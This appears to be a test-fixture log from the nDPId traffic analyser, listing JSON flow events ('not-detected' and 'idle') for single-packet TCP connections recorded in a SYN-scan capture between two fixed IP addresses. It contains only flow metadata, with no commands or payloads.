-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1895,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":90,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":89,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060182,"flow_last_seen":1278275060182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":89,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1957,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":90,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1957,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":90,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":61532,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":61532,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":61532,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":61532,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2144,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2144,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2144,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8290,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8290,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8290,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1609,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8290,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":99,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":99,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8291,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8291,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8292,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":578,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059409,"flow_last_seen":1278275059409,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8292,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":99,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":99,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8291,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8291,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8292,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8292,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":918,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14441,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":918,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14441,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":979,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14441,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":979,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14441,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":106,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14442,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14442,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":106,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14442,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14442,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8300,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
